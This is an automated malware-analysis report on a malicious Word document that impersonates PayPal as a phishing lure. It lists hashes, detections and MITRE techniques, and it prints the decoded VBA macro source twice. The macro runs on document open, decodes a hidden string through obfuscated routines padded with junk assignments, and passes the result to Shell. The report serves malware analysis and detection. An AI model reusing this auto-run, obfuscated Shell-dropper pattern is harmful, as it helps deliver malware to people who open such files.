Office (OLE) malware analysis — malicious · 3ffa644f3336f143

MALICIOUS

Office (OLE)

42.5 KB Created: 2018-10-05 01:57:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 41712d78d39ffa8e791a450f9037697d SHA-1: fee1edfc7c20d1a0fd1e684a0bd6a68f600f7f70 SHA-256: 3ffa644f3336f143458e68b7e86e0818dfbe009295475dae8dbb091ade009797

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious Office documents. The macro utilizes the Shell() function, indicating it likely executes a secondary payload. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification, which is a typical phishing lure. The presence of VBA macros and the phishing pretext strongly suggest a malicious intent, likely for credential harvesting or identity theft.

Heuristics 5

ClamAV: Doc.Malware.Generic-6708833-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6708833-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9614 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9614 bytes
SHA-256: `422433ade305bcd73d7a57db25ff7b2c8df1a098891cd577baf13419982dc2e8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() array44 = "arr" array4 array44 array44 = "44" End Sub Attribute VB_Name = "plus" Public Sub General() ctr = "" currentTime secondBracketAddress.wl, ctr secondBracketAddress.either = ctr secondBracketAddress.allocating = secondBracketAddress.either End Sub Attribute VB_Name = "secondBracketAddress" Attribute VB_Base = "0{A32D73AA-AC1B-4F40-BC29-B534231117BA}{BE71A090-5D98-474F-8464-158D00037C8C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub allocating_Change() below = 21 below = 49 below = 40 below = 24 below = 71 below = 15 below = 76 below = 40 below = 60 below = 45 below = 53 below = 42 below = 85 below = 56 below = 91 below = 50 reportErr = secondBracketAddress.allocating below = 9 below = 66 below = 30 below = 31 below = 94 below = 36 below = 25 below = 49 below = 79 below = 58 below = 21 below = 34 below = 46 below = 35 below = 68 below = 90 below = 7 below = 82 below = 78 below = 46 Shell reportErr, 0 below = 16 below = 21 below = 62 below = 75 below = 22 below = 22 below = 67 below = 98 below = 92 below = 6 below = 43 below = 80 below = 13 below = 36 End Sub Private Sub msg_Change() General End Sub Attribute VB_Name = "SYS_gettid" Sub CP_ACP(now, currentdepth, ByRef isAddressOnStack) isAddressOnStack = Right(Left(now, currentdepth), 1) End Sub Sub currentTime(mapped, ByRef si_addr) si_addr = "" filecount = 1 along filecount, si_addr, mapped End Sub Sub along(ByRef invalid, ByRef maxdepth, instead) heapVariable = Len(instead) If invalid <= heapVariable Then cpcr = "" CP_ACP instead, invalid, cpcr irc = 1 iter cpcr, icr snr = "" sensitive icr - 2, snr maxdepth = maxdepth + snr invalid = invalid + 1 along invalid, maxdepth, instead End If End Sub Sub sensitive(method, ByRef sr) sr = "" If method < 1 Then CP_ACP secondBracketAddress.attempt, Len(secondBracketAddress.attempt) + method, sr Else CP_ACP secondBracketAddress.attempt, method, sr End If End Sub Sub within(ByRef wcContainer, ByRef object, PVOID) If wcContainer < Len(secondBracketAddress.attempt) Then cpcr = "" CP_ACP secondBracketAddress.attempt, wcContainer, cpcr If PVOID <> cpcr Then wcContainer = wcContainer + 1 within wcContainer, object, PVOID Else object = wcContainer End If End If End Sub Sub iter(PVOID, ByRef object) wcContainer = 1 object = 1 within wcContainer, object, PVOID End Sub Attribute VB_Name = "ThreadExecutor" Public Sub array4(typename) secondBracketAddress.msg = typename End Sub ' Processing file: /opt/analyzer/scan_staging/5d3e805fd11741cd861e37b8d13cd93c.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1193 bytes ' Line #0: ' FuncDefn (Sub Document_Open()) ' Line #1: ' LitStr 0x0003 "arr" ' St array44 ' Line #2: ' Ld array44 ' ArgsCall array4 0x0001 ' Line #3: ' LitStr 0x0002 "44" ' St array44 ' Line #4: ' Line #5: ' EndSub ' Line #6: ' Macros/VBA/plus - 1003 bytes ' Line #0: ' FuncDefn (Public Sub General()) ' Line #1: ' LitStr 0x0000 "" ' St ctr ' Line #2: ' Ld secondBracketAddress ' MemLd wl ' Ld ctr ' ArgsCall currentTime 0x0002 ' Line #3: ' Ld ctr ' Ld secondBracketAddress ' MemSt either ' Line #4: ' Ld secondBracketAddress ' MemLd either ' Ld secondBracketAddress ' MemSt allocating ' Line #5: ' EndSub ' Macros/VBA/secondBracketAddress - 2763 bytes ' Line #0: ' Line #1: ' Line #2: ' Line #3: ' FuncDefn (Private Sub allocating_Change()) ' Line #4: ' LitDI2 ... (truncated)

SHA-256: 422433ade305bcd73d7a57db25ff7b2c8df1a098891cd577baf13419982dc2e8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
array44 = "arr"
array4 array44
array44 = "44"

End Sub


Attribute VB_Name = "plus"
Public Sub General()
ctr = ""
currentTime secondBracketAddress.wl, ctr
secondBracketAddress.either = ctr
secondBracketAddress.allocating = secondBracketAddress.either
End Sub

Attribute VB_Name = "secondBracketAddress"
Attribute VB_Base = "0{A32D73AA-AC1B-4F40-BC29-B534231117BA}{BE71A090-5D98-474F-8464-158D00037C8C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Private Sub allocating_Change()
below = 21
below = 49
below = 40
below = 24
below = 71
below = 15
below = 76
below = 40
below = 60
below = 45
below = 53
below = 42
below = 85
below = 56
below = 91
below = 50
reportErr = secondBracketAddress.allocating
below = 9
below = 66
below = 30
below = 31
below = 94
below = 36
below = 25
below = 49
below = 79
below = 58
below = 21
below = 34
below = 46
below = 35
below = 68
below = 90
below = 7
below = 82
below = 78
below = 46
Shell reportErr, 0
below = 16
below = 21
below = 62
below = 75
below = 22
below = 22
below = 67
below = 98
below = 92
below = 6
below = 43
below = 80
below = 13
below = 36
End Sub

Private Sub msg_Change()
General
End Sub

Attribute VB_Name = "SYS_gettid"
Sub CP_ACP(now, currentdepth, ByRef isAddressOnStack)
isAddressOnStack = Right(Left(now, currentdepth), 1)
End Sub

Sub currentTime(mapped, ByRef si_addr)
si_addr = ""
filecount = 1
along filecount, si_addr, mapped
End Sub

Sub along(ByRef invalid, ByRef maxdepth, instead)
heapVariable = Len(instead)
If invalid <= heapVariable Then
cpcr = ""
CP_ACP instead, invalid, cpcr
irc = 1
iter cpcr, icr
snr = ""
sensitive icr - 2, snr
maxdepth = maxdepth + snr
invalid = invalid + 1
along invalid, maxdepth, instead
End If
End Sub

Sub sensitive(method, ByRef sr)
sr = ""
If method < 1 Then
CP_ACP secondBracketAddress.attempt, Len(secondBracketAddress.attempt) + method, sr
Else
CP_ACP secondBracketAddress.attempt, method, sr
End If
End Sub

Sub within(ByRef wcContainer, ByRef object, PVOID)
If wcContainer < Len(secondBracketAddress.attempt) Then
    cpcr = ""
    CP_ACP secondBracketAddress.attempt, wcContainer, cpcr
    If PVOID <> cpcr Then
    wcContainer = wcContainer + 1
    within wcContainer, object, PVOID
    Else
    object = wcContainer
    End If
End If
End Sub

Sub iter(PVOID, ByRef object)
wcContainer = 1
object = 1
within wcContainer, object, PVOID
End Sub
  

Attribute VB_Name = "ThreadExecutor"
Public Sub array4(typename)
secondBracketAddress.msg = typename
End Sub

' Processing file: /opt/analyzer/scan_staging/5d3e805fd11741cd861e37b8d13cd93c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1193 bytes
' Line #0:
' 	FuncDefn (Sub Document_Open())
' Line #1:
' 	LitStr 0x0003 "arr"
' 	St array44 
' Line #2:
' 	Ld array44 
' 	ArgsCall array4 0x0001 
' Line #3:
' 	LitStr 0x0002 "44"
' 	St array44 
' Line #4:
' Line #5:
' 	EndSub 
' Line #6:
' Macros/VBA/plus - 1003 bytes
' Line #0:
' 	FuncDefn (Public Sub General())
' Line #1:
' 	LitStr 0x0000 ""
' 	St ctr 
' Line #2:
' 	Ld secondBracketAddress 
' 	MemLd wl 
' 	Ld ctr 
' 	ArgsCall currentTime 0x0002 
' Line #3:
' 	Ld ctr 
' 	Ld secondBracketAddress 
' 	MemSt either 
' Line #4:
' 	Ld secondBracketAddress 
' 	MemLd either 
' 	Ld secondBracketAddress 
' 	MemSt allocating 
' Line #5:
' 	EndSub 
' Macros/VBA/secondBracketAddress - 2763 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Sub allocating_Change())
' Line #4:
' 	LitDI2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.